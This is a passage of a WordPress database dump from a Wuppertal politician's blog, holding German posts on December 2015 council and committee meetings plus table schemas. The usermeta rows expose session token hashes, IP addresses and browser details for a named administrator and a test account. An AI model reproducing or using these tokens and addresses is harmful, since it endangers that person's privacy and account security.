Bericht zur Strategie Wuppertal 2025 auf der Tagesordnung. In letzterem ist auch die geplante Seilbahn eingearbeitet. Dr. Slawig führte aus, dass der Grundsatzbeschluss des Rates zur Seilbahn für den Herbst 2016 erwartet wird, der nächste Schritt ist jetzt der politische Auftrag an die WSW, eine Projektstudie zu erarbeiten und das Bürgerbeteiligungsverfahren einzuleiten.\r\nAuch Beschluss über den Haushalt 2016/17 wurde auf Hauptauschuss und Rat vertagt.','Ausschuss Stadtentwicklung 03.12.2015','','inherit','closed','closed','','405-revision-v1','','','2015-12-03 17:03:12','2015-12-03 16:03:12','',405,'http://www.ollital.de/wordpress/index.php/2015/12/405-revision-v1/',0,'revision','',0),(410,2,'2015-12-03 17:20:59','2015-12-03 16:20:59','In der heutigen Sitzung standen so wichtige Dinge wie die Schaffung des Pina Bausch Tanzentrums und der Bericht zur Strategie Wuppertal 2025 auf der Tagesordnung. In letzterem ist auch die geplante Seilbahn eingearbeitet. Dr. Slawig führte aus, dass der Grundsatzbeschluss des Rates zur Seilbahn für den Herbst 2016 erwartet wird, der nächste Schritt ist jetzt der politische Auftrag an die WSW, eine Projektstudie zu erarbeiten und das Bürgerbeteiligungsverfahren einzuleiten.\r\nAuch Beschluss über den Haushalt 2016/17 wurde auf Hauptauschuss und Rat vertagt.\r\nEbenso vertagt wurde der Aufstellungsbeschluss für die gemeinsame bergische Multifunktionsarena.','Ausschuss Stadtentwicklung 03.12.2015','','inherit','closed','closed','','405-revision-v1','','','2015-12-03 17:20:59','2015-12-03 16:20:59','',405,'http://www.ollital.de/wordpress/index.php/2015/12/405-revision-v1/',0,'revision','',0),(411,2,'2015-12-03 19:30:29','2015-12-03 18:30:29','In der heutigen Sitzung standen so wichtige Dinge wie die Schaffung des Pina Bausch Tanzentrums und der Bericht zur Strategie Wuppertal 2025 auf der Tagesordnung. In letzterem ist auch die geplante Seilbahn eingearbeitet. Dr. Slawig führte aus, dass der Grundsatzbeschluss des Rates zur Seilbahn für den Herbst 2016 erwartet wird, der nächste Schritt ist jetzt der politische Auftrag an die WSW, eine Projektstudie zu erarbeiten und das Bürgerbeteiligungsverfahren einzuleiten.\r\nAuch Beschluss über den Haushalt 2016/17 wurde auf Hauptauschuss und Rat vertagt.','Ausschuss Stadtentwicklung 03.12.2015','','inherit','closed','closed','','405-revision-v1','','','2015-12-03 19:30:29','2015-12-03 18:30:29','',405,'http://www.ollital.de/wordpress/index.php/2015/12/405-revision-v1/',0,'revision','',0),(413,2,'2015-12-09 21:53:45','2015-12-09 20:53:45','Das Haupthema in der gemeinsamen Sitzung von Sportauschuss und Betriebsauschuss Gebäudemanagement war ein Workshop zur Sanierung des Freibads Mählersbeck in Nächstebreck.\r\n\r\nDr. Flunkert ( Leiter GMW) gab zunächst ein paar Fakten zum Bad bekannt.\r\nDas Bad wurde 1920 erbaut und die Technik ist überwiegend auf dem Stand der 1970er Jahre.\r\nIm Haushalt 2016/17 sind 5 Mio EUR für die Sanierung des Freibads eingestellt. Über ein Förderprogramm des Bundes\r\nsoll die gleiche Summe nochmal für die Sanierung aufgebracht werden. Was passieren soll, wenn diese Fördergelder\r\nnicht bewilligt werden sollten, wurde nicht eindeutig geklärt.\r\nDie Sanierung wäre ordnungsrechtlich wie ein Neubau zu werten, so dass dann auch die aktuellen Gesetze, wie z.B. das\r\nBundesimmissionsschutzgesetz zu beachten sind.\r\n\r\nIn dem heutigen Workshop haben wir uns zunächst im Plenum Gedanken über die zukünftigen Benutzergruppen\r\ngemacht. Dabei kamen wir auf Benutzer wie:\r\n\r\n
                                                                  \r\n
                                                                • Inklusion von Behinderten
                                                                • \r\n
                                                                • Schulschwimmen
                                                                • \r\n
                                                                • Früh- und Spätnutzer
                                                                • \r\n
                                                                • Wasserball
                                                                • \r\n
                                                                • Firmensport
                                                                • \r\n
                                                                • Kleinkinder
                                                                • \r\n
                                                                • Turmspringer
                                                                • \r\n
                                                                \r\n\r\nIn Arbeitsgruppen haben wir dann erarbeitet, welche Voraussetzungen für die diversen Gruppen geschaffen werden müssen.\r\nDas Thema wird in der nächsten Sitzung des Sportauschusses im Feburaur 2016 wieder auf der Tagesordnung stehen. Ich bin gespannt,\r\nwie es weitergeht.\r\n \r\n','Workshop zur Sanierung der Mählersbeck','','publish','open','open','','workshop-zur-sanierung-der-mahlersbeck','','','2015-12-10 19:21:04','2015-12-10 18:21:04','',0,'http://www.ollital.de/wordpress/?p=413',0,'post','',0),(414,2,'2015-12-09 16:20:41','2015-12-09 15:20:41','Sanierung Freibad Mählersbeck 5Mio bis 2018 Förderprogramm März\r\n\r\nErbaut 1920\r\nTechnik aus 70er\r\nOrdnungsrechtlich Neubau, planungsrechtlich Bestandsschutz\r\n\r\nSporthalle Katernberg\r\nKunstrasen \r\nJährlicher Verlust ca. 20mio EUr\r\n','Gemeinsame Sitzung Sportausschuss und BA GMW','','inherit','closed','closed','','413-revision-v1','','','2015-12-09 16:20:41','2015-12-09 15:20:41','',413,'http://www.ollital.de/wordpress/index.php/2015/12/413-revision-v1/',0,'revision','',0),(415,2,'2015-12-09 21:53:14','2015-12-09 20:53:14','Das Haupthema in der gemeinsamen Sitzung von Sportauschuss und Betriebsauschuss Gebäudemanagement war\r\nein Workshop zur Sanierung des Freibads Mählersbeck in Nächstebreck.\r\n\r\nDr. Flunkert ( Leiter GMW) gab zunächst ein paar Fakten zum Bad bekannt.\r\nDas Bad wurde 1920 erbaut und die Technik ist überwiegend auf dem Stand der 1970er Jahre.\r\nIm Haushalt 2016/17 sind 5 Mio EUR für die Sanierung des Freibads eingestellt. Über ein Förderprogramm des Bundes\r\nsoll die gleiche Summe nochmal für die Sanierung aufgebracht werden. Was passieren soll, wenn diese Fördergelder\r\nnicht bewilligt werden sollten, wurde nicht eindeutig geklärt.\r\nDie Sanierung wäre ordnungsrechtlich wie ein Neubau zu werten, so dass dann auch die aktuellen Gesetze, wie z.B. das\r\nBundesimmissionsschutzgesetz zu beachten sind.\r\n\r\nIn dem heutigen Workshop haben wir uns zunächst im Plenum Gedanken über die zukünftigen Benutzergruppen\r\ngemacht. Dabei kamen wir auf Benutzer wie:\r\n\r\n
                                                                  \r\n
                                                                • Inklusion von Behinderten
                                                                • \r\n
                                                                • Schulschwimmen
                                                                • \r\n
                                                                • Früh- und Spätnutzer
                                                                • \r\n
                                                                • Wasserball
                                                                • \r\n
                                                                • Firmensport
                                                                • \r\n
                                                                • Kleinkinder
                                                                • \r\n
                                                                • Turmspringer
                                                                • \r\n
                                                                \r\n\r\nIn Arbeitsgruppen haben wir dann erarbeitet, welche Voraussetzungen für die diversen Gruppen geschaffen werden müssen.\r\nDas Thema wird in der nächsten Sitzung des Sportauschusses im Feburaur 2016 wieder auf der Tagesordnung stehen. Ich bin gespannt,\r\nwie es weitergeht.\r\n \r\n','Workshop zur Sanierung der Mählersbeck','','inherit','closed','closed','','413-revision-v1','','','2015-12-09 21:53:14','2015-12-09 20:53:14','',413,'http://www.ollital.de/wordpress/index.php/2015/12/413-revision-v1/',0,'revision','',0),(416,2,'2015-12-10 19:21:04','2015-12-10 18:21:04','Das Haupthema in der gemeinsamen Sitzung von Sportauschuss und Betriebsauschuss Gebäudemanagement war ein Workshop zur Sanierung des Freibads Mählersbeck in Nächstebreck.\r\n\r\nDr. Flunkert ( Leiter GMW) gab zunächst ein paar Fakten zum Bad bekannt.\r\nDas Bad wurde 1920 erbaut und die Technik ist überwiegend auf dem Stand der 1970er Jahre.\r\nIm Haushalt 2016/17 sind 5 Mio EUR für die Sanierung des Freibads eingestellt. Über ein Förderprogramm des Bundes\r\nsoll die gleiche Summe nochmal für die Sanierung aufgebracht werden. Was passieren soll, wenn diese Fördergelder\r\nnicht bewilligt werden sollten, wurde nicht eindeutig geklärt.\r\nDie Sanierung wäre ordnungsrechtlich wie ein Neubau zu werten, so dass dann auch die aktuellen Gesetze, wie z.B. das\r\nBundesimmissionsschutzgesetz zu beachten sind.\r\n\r\nIn dem heutigen Workshop haben wir uns zunächst im Plenum Gedanken über die zukünftigen Benutzergruppen\r\ngemacht. Dabei kamen wir auf Benutzer wie:\r\n\r\n
                                                                  \r\n
                                                                • Inklusion von Behinderten
                                                                • \r\n
                                                                • Schulschwimmen
                                                                • \r\n
                                                                • Früh- und Spätnutzer
                                                                • \r\n
                                                                • Wasserball
                                                                • \r\n
                                                                • Firmensport
                                                                • \r\n
                                                                • Kleinkinder
                                                                • \r\n
                                                                • Turmspringer
                                                                • \r\n
                                                                \r\n\r\nIn Arbeitsgruppen haben wir dann erarbeitet, welche Voraussetzungen für die diversen Gruppen geschaffen werden müssen.\r\nDas Thema wird in der nächsten Sitzung des Sportauschusses im Feburaur 2016 wieder auf der Tagesordnung stehen. Ich bin gespannt,\r\nwie es weitergeht.\r\n \r\n','Workshop zur Sanierung der Mählersbeck','','inherit','closed','closed','','413-revision-v1','','','2015-12-10 19:21:04','2015-12-10 18:21:04','',413,'http://www.ollital.de/wordpress/index.php/2015/12/413-revision-v1/',0,'revision','',0),(417,2,'2015-12-14 20:49:07','2015-12-14 19:49:07','In der letzten Jahressitzung war das Hauptthema die Verabschiedung des Doppelhaushalts 2026/2017. Mit dessen Verabschiedung verfügt Wuppertal zum ersten Mal einen\r\nausgeglichenen Haushalt seit 25 Jahren. Die von unserer Fraktion eingebrachten Änderungsanträge wurden allesamt ärgerlicherweise abgelehnt.\r\nVor Einstieg in die TO wurde die Ehrennadel an mehrere Rats- bzw. BV-Mitglieder für ihre langjährige ehrenamtliche Tätigkeit verliehen.\r\nDer von der FDP eingebrachte Grundsatzbeschluss für die Seilbahn wurde heute nicht behandelt.\r\nDer Bau von insgesamt 6 neuen städtischen Kindertageseinrichtungen wurde heute beschlossen.\r\nDie Einrichtung des Pina Bausch Tanzzentrums wurde einstimmig beschlossen. Allerdings ohne einen Vorbehalt für die Regelung der Betriebskosten.\r\n\r\n','Ratssitzung vom 14.12.2015','','publish','open','open','','ratssitzung-vom-14-12-2015','','','2015-12-14 20:49:07','2015-12-14 19:49:07','',0,'http://www.ollital.de/wordpress/?p=417',0,'post','',0),(418,2,'2015-12-14 20:49:07','2015-12-14 19:49:07','In der letzten Jahressitzung war das Hauptthema die Verabschiedung des Doppelhaushalts 2026/2017. Mit dessen Verabschiedung verfügt Wuppertal zum ersten Mal einen\r\nausgeglichenen Haushalt seit 25 Jahren. Die von unserer Fraktion eingebrachten Änderungsanträge wurden allesamt ärgerlicherweise abgelehnt.\r\nVor Einstieg in die TO wurde die Ehrennadel an mehrere Rats- bzw. BV-Mitglieder für ihre langjährige ehrenamtliche Tätigkeit verliehen.\r\nDer von der FDP eingebrachte Grundsatzbeschluss für die Seilbahn wurde heute nicht behandelt.\r\nDer Bau von insgesamt 6 neuen städtischen Kindertageseinrichtungen wurde heute beschlossen.\r\nDie Einrichtung des Pina Bausch Tanzzentrums wurde einstimmig beschlossen. Allerdings ohne einen Vorbehalt für die Regelung der Betriebskosten.\r\n\r\n','Ratssitzung vom 14.12.2015','','inherit','closed','closed','','417-revision-v1','','','2015-12-14 20:49:07','2015-12-14 19:49:07','',417,'http://www.ollital.de/wordpress/index.php/2015/12/417-revision-v1/',0,'revision','',0); /*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_smooth_slider` -- DROP TABLE IF EXISTS `wp_smooth_slider`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_smooth_slider` ( `id` int(5) NOT NULL AUTO_INCREMENT, `post_id` int(11) NOT NULL, `date` datetime NOT NULL, `slider_id` int(5) NOT NULL DEFAULT '1', `slide_order` int(5) NOT NULL DEFAULT '0', `expiry` date DEFAULT NULL, UNIQUE KEY `id` (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_smooth_slider` -- LOCK TABLES `wp_smooth_slider` WRITE; /*!40000 ALTER TABLE `wp_smooth_slider` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_smooth_slider` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_smooth_slider_meta` -- DROP TABLE IF EXISTS `wp_smooth_slider_meta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_smooth_slider_meta` ( `slider_id` int(5) NOT NULL AUTO_INCREMENT, `slider_name` varchar(100) NOT NULL DEFAULT '', UNIQUE KEY `slider_id` (`slider_id`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_smooth_slider_meta` -- LOCK TABLES `wp_smooth_slider_meta` WRITE; /*!40000 ALTER TABLE `wp_smooth_slider_meta` DISABLE KEYS */; INSERT INTO `wp_smooth_slider_meta` VALUES (1,'Smooth Slider'); /*!40000 ALTER TABLE `wp_smooth_slider_meta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_smooth_slider_postmeta` -- DROP TABLE IF EXISTS `wp_smooth_slider_postmeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_smooth_slider_postmeta` ( `post_id` int(11) NOT NULL, `slider_id` int(5) NOT NULL DEFAULT '1', UNIQUE KEY `post_id` (`post_id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_smooth_slider_postmeta` -- LOCK TABLES `wp_smooth_slider_postmeta` WRITE; /*!40000 ALTER TABLE `wp_smooth_slider_postmeta` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_smooth_slider_postmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_term_relationships` -- DROP TABLE IF EXISTS `wp_term_relationships`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_term_relationships` ( `object_id` bigint(20) unsigned NOT NULL DEFAULT '0', `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT '0', `term_order` int(11) NOT NULL DEFAULT '0', PRIMARY KEY (`object_id`,`term_taxonomy_id`), KEY `term_taxonomy_id` (`term_taxonomy_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_term_relationships` -- LOCK TABLES `wp_term_relationships` WRITE; /*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */; INSERT INTO `wp_term_relationships` VALUES (5,2,0),(10,3,0),(18,4,0),(35,5,0),(41,4,0),(41,6,0),(41,7,0),(43,4,0),(43,6,0),(51,3,0),(51,6,0),(59,4,0),(59,5,0),(62,6,0),(66,4,0),(66,5,0),(69,3,0),(69,6,0),(71,8,0),(71,9,0),(85,4,0),(85,10,0),(88,7,0),(88,10,0),(98,8,0),(103,12,0),(105,3,0),(105,13,0),(112,8,0),(112,9,0),(114,7,0),(116,3,0),(122,11,0),(130,8,0),(135,14,0),(139,10,0),(139,15,0),(142,7,0),(142,11,0),(142,12,0),(148,8,0),(148,9,0),(157,7,0),(157,16,0),(165,17,0),(167,17,0),(168,17,0),(172,18,0),(176,3,0),(176,7,0),(176,12,0),(176,14,0),(176,19,0),(187,15,0),(187,16,0),(189,16,0),(189,20,0),(199,8,0),(199,9,0),(212,15,0),(216,9,0),(221,2,0),(221,11,0),(224,7,0),(224,12,0),(224,13,0),(224,15,0),(229,21,0),(229,22,0),(233,2,0),(233,12,0),(237,20,0),(240,9,0),(245,3,0),(245,13,0),(254,2,0),(256,7,0),(261,7,0),(265,15,0),(269,7,0),(272,16,0),(276,9,0),(283,3,0),(287,12,0),(289,14,0),(294,3,0),(296,1,0),(296,21,0),(303,3,0),(303,12,0),(309,1,0),(309,9,0),(313,9,0),(318,3,0),(318,23,0),(318,24,0),(321,9,0),(324,9,0),(326,23,0),(331,3,0),(331,9,0),(331,20,0),(331,23,0),(339,3,0),(339,15,0),(346,4,0),(346,25,0),(349,3,0),(354,3,0),(354,26,0),(371,19,0),(384,17,0),(386,14,0),(386,23,0),(398,5,0),(398,11,0),(403,14,0),(405,7,0),(405,20,0),(413,10,0),(413,14,0),(413,27,0),(417,3,0),(417,23,0); /*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_term_taxonomy` -- DROP TABLE IF EXISTS `wp_term_taxonomy`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_term_taxonomy` ( `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `term_id` bigint(20) unsigned NOT NULL DEFAULT '0', `taxonomy` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `description` longtext COLLATE utf8mb4_unicode_ci NOT NULL, `parent` bigint(20) unsigned NOT NULL DEFAULT '0', `count` bigint(20) NOT NULL DEFAULT '0', PRIMARY KEY (`term_taxonomy_id`), UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`), KEY `taxonomy` (`taxonomy`) ) ENGINE=InnoDB AUTO_INCREMENT=28 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_term_taxonomy` -- LOCK TABLES `wp_term_taxonomy` WRITE; /*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */; INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,2),(2,2,'category','',0,4),(3,3,'category','',0,16),(4,4,'category','',0,7),(5,5,'category','',0,4),(6,6,'category','',0,5),(7,7,'category','Auschuss Stadtentwicklung Wirtschaft und Bauen (Mitglied mit beratender Stimme)',10,11),(8,8,'category','',0,6),(9,9,'category','',0,12),(10,10,'category','',0,4),(11,11,'category','Allgemeines aus Wuppertal',0,4),(12,12,'category','',0,7),(13,13,'category','',0,3),(14,14,'category','Betriebsauschuss Gebäudemanagement (ordentliches Mitglied)',10,6),(15,15,'category','',0,6),(16,16,'category','',0,4),(17,17,'nav_menu','',0,4),(18,18,'advanced_ads_groups','',0,1),(19,19,'category','',0,2),(20,20,'category','Informationen rund um die Seilbahn von HBf - Uni - Schulzentrum Süd',0,4),(21,21,'category','',0,2),(22,22,'category','',0,1),(23,23,'category','',0,5),(24,24,'category','',0,1),(25,25,'category','',0,1),(26,26,'category','',0,1),(27,27,'category','',0,1); /*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_termmeta` -- DROP TABLE IF EXISTS `wp_termmeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_termmeta` ( `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `term_id` bigint(20) unsigned NOT NULL DEFAULT '0', `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL, `meta_value` longtext COLLATE utf8mb4_unicode_ci, PRIMARY KEY (`meta_id`), KEY `term_id` (`term_id`), KEY `meta_key` (`meta_key`(191)) ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_termmeta` -- LOCK TABLES `wp_termmeta` WRITE; /*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_terms` -- DROP TABLE IF EXISTS `wp_terms`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_terms` ( `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `slug` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `term_group` bigint(10) NOT NULL DEFAULT '0', PRIMARY KEY (`term_id`), KEY `slug` (`slug`(191)), KEY `name` (`name`(191)) ) ENGINE=InnoDB AUTO_INCREMENT=28 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_terms` -- LOCK TABLES `wp_terms` WRITE; /*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */; INSERT INTO `wp_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'Allgemein','allgemein',0),(3,'Ratssitzung','ratssitzung',0),(4,'Politik in Wuppertal','politik-in-wuppertal',0),(5,'Piraten Wuppertal','piraten-wuppertal',0),(6,'Carnaper Platz','carnaper-platz',0),(7,'StaWiBau','stawibau',0),(8,'Wuppertal 3.0','wuppertal-3-0',0),(9,'OB Wahl 2015','ob-wahl-2015',0),(10,'Auschusssitzung','auschusssitzung',0),(11,'Wuppertal','wpt',0),(12,'Freifunk','freifunk',0),(13,'IKEA','ikea',0),(14,'Gebäudemanagement','gebaudemanagement',0),(15,'Nordbahntrasse','nordbahntrasse',0),(16,'Verkehr in Wuppertal','verkehr-in-wuppertal',0),(17,'Menu 1','menu-1',0),(18,'OlliTal','olli1770',0),(19,'Forensik','forensik',0),(20,'Seilbahn','seilbahn',0),(21,'Demo','demo',0),(22,'Überwachung & VDS','uberwachung-vds',0),(23,'Haushalt','haushalt',0),(24,'Flüchtlinge','fluchtlinge',0),(25,'Rat','rat',0),(26,'Transparenz','transparenz',0),(27,'Sanierung Mählersbeck','sanierung-mahlersbeck',0); /*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_usermeta` -- DROP TABLE IF EXISTS `wp_usermeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_usermeta` ( `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `user_id` bigint(20) unsigned NOT NULL DEFAULT '0', `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL, `meta_value` longtext COLLATE utf8mb4_unicode_ci, PRIMARY KEY (`umeta_id`), KEY `user_id` (`user_id`), KEY `meta_key` (`meta_key`(191)) ) ENGINE=InnoDB AUTO_INCREMENT=87 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_usermeta` -- LOCK TABLES `wp_usermeta` WRITE; /*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */; INSERT INTO `wp_usermeta` VALUES (28,2,'first_name','Olli'),(29,2,'last_name','Graf'),(30,2,'nickname','Olli'),(31,2,'description',''),(32,2,'rich_editing','true'),(33,2,'comment_shortcuts','false'),(34,2,'admin_color','fresh'),(35,2,'use_ssl','0'),(36,2,'show_admin_bar_front','true'),(37,2,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(38,2,'wp_user_level','10'),(39,2,'dismissed_wp_pointers','wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media,wp360_revisions,wp360_locks,tp09_edit_drag_drop_sort'),(52,2,'wp_dashboard_quick_press_last_post_id','419'),(53,2,'wsal-notice-notifications-extension','1'),(54,2,'meta-box-order_dashboard','a:4:{s:6:\"normal\";s:66:\"dashboard_right_now,wsal,dashboard_activity,jetpack_summary_widget\";s:4:\"side\";s:39:\"dashboard_quick_press,dashboard_primary\";s:7:\"column3\";s:0:\"\";s:7:\"column4\";s:0:\"\";}'),(55,2,'screen_layout_dashboard','2'),(56,2,'session_tokens','a:3:{s:64:\"fe391abe42a8b5739706a48f3da336c4534fcc05aaebd8aaf7a11a8521dbc197\";a:4:{s:10:\"expiration\";i:1450338141;s:2:\"ip\";s:13:\"195.128.40.90\";s:2:\"ua\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36\";s:5:\"login\";i:1450165341;}s:64:\"54541ee6de4a37c22c416152bda181e297e91dbd2ba7c6c38df3cd73ab2ab09c\";a:4:{s:10:\"expiration\";i:1450389236;s:2:\"ip\";s:12:\"5.147.41.205\";s:2:\"ua\";s:104:\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36\";s:5:\"login\";i:1450216436;}s:64:\"bb84ffe8c8155abb58450fbeee99a4cb83a19f2b0ea2686555aa631fabbcbf79\";a:4:{s:10:\"expiration\";i:1450389412;s:2:\"ip\";s:12:\"5.147.41.205\";s:2:\"ua\";s:104:\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36\";s:5:\"login\";i:1450216612;}}'),(57,2,'closedpostboxes_dashboard','a:1:{i:0;s:4:\"wsal\";}'),(58,2,'metaboxhidden_dashboard','a:0:{}'),(59,2,'wporg_favorites',''),(60,2,'nav_menu_recently_edited','17'),(61,2,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(62,2,'metaboxhidden_nav-menus','a:2:{i:0;s:12:\"add-post_tag\";i:1;s:15:\"add-post_format\";}'),(63,2,'wp_tablepress_user_options','{\"user_options_db_version\":32,\"admin_menu_parent_page\":\"middle\",\"message_first_visit\":true}'),(64,2,'managetablepress_listcolumnshidden','a:1:{i:0;s:22:\"table_last_modified_by\";}'),(65,4,'nickname','Tester'),(66,4,'first_name','Homer'),(67,4,'last_name','Simpson'),(68,4,'description',''),(69,4,'rich_editing','true'),(70,4,'comment_shortcuts','false'),(71,4,'admin_color','fresh'),(72,4,'use_ssl','0'),(73,4,'show_admin_bar_front','true'),(74,4,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(75,4,'wp_user_level','0'),(76,4,'dismissed_wp_pointers',''),(77,4,'maa_settings_backup','a:9:{s:7:\"ad_mode\";s:13:\"basic_adsense\";s:9:\"help_mode\";s:0:\"\";s:13:\"publisherid_1\";s:0:\"\";s:13:\"publisherid_2\";s:0:\"\";s:20:\"maa_auto_insert_when\";s:0:\"\";s:14:\"ad_code_slot_1\";s:0:\"\";s:14:\"ad_code_slot_2\";s:0:\"\";s:18:\"auto_insert_1_code\";N;s:19:\"auto_insert_1_where\";N;}'),(78,4,'maa_settings','a:9:{s:7:\"ad_mode\";s:13:\"basic_adsense\";s:9:\"help_mode\";s:0:\"\";s:13:\"publisherid_1\";s:0:\"\";s:13:\"publisherid_2\";s:0:\"\";s:20:\"maa_auto_insert_when\";s:0:\"\";s:14:\"ad_code_slot_1\";s:0:\"\";s:14:\"ad_code_slot_2\";s:0:\"\";s:18:\"auto_insert_1_code\";N;s:19:\"auto_insert_1_where\";N;}'),(79,4,'session_tokens','a:1:{s:64:\"8e95ee06d21fd8c9834a378c70243e439bfcbeab7d21095e14e964ec8d2c840d\";a:4:{s:10:\"expiration\";i:1448535959;s:2:\"ip\";s:13:\"195.128.40.90\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1448363159;}}'),(80,2,'wp_user-settings','mfold=o&editor=html&libraryContent=browse'),(81,2,'wp_user-settings-time','1448877891'),(82,2,'meta-box-order_post','a:3:{s:4:\"side\";s:61:\"formatdiv,submitdiv,categorydiv,tagsdiv-post_tag,postimagediv\";s:6:\"normal\";s:71:\"postexcerpt,trackbacksdiv,postcustom,commentstatusdiv,slugdiv,authordiv\";s:8:\"advanced\";s:25:\"sslider_box1,sharing_meta\";}'),(83,2,'screen_layout_post','2'),(84,2,'default_password_nag',''),(85,2,'closedpostboxes_post','a:0:{}'),(86,2,'metaboxhidden_post','a:6:{i:0;s:11:\"postexcerpt\";i:1;s:13:\"trackbacksdiv\";i:2;s:10:\"postcustom\";i:3;s:16:\"commentstatusdiv\";i:4;s:7:\"slugdiv\";i:5;s:9:\"authordiv\";}'); /*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_users` -- DROP TABLE IF EXISTS `wp_users`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_users` ( `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `user_login` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `user_pass` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `user_nicename` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `user_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `user_url` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', `user_status` int(11) NOT NULL DEFAULT '0', `display_name` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '', PRIMARY KEY (`ID`), KEY `user_login_key` (`user_login`), KEY `user_nicename` (`user_nicename`) ) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table 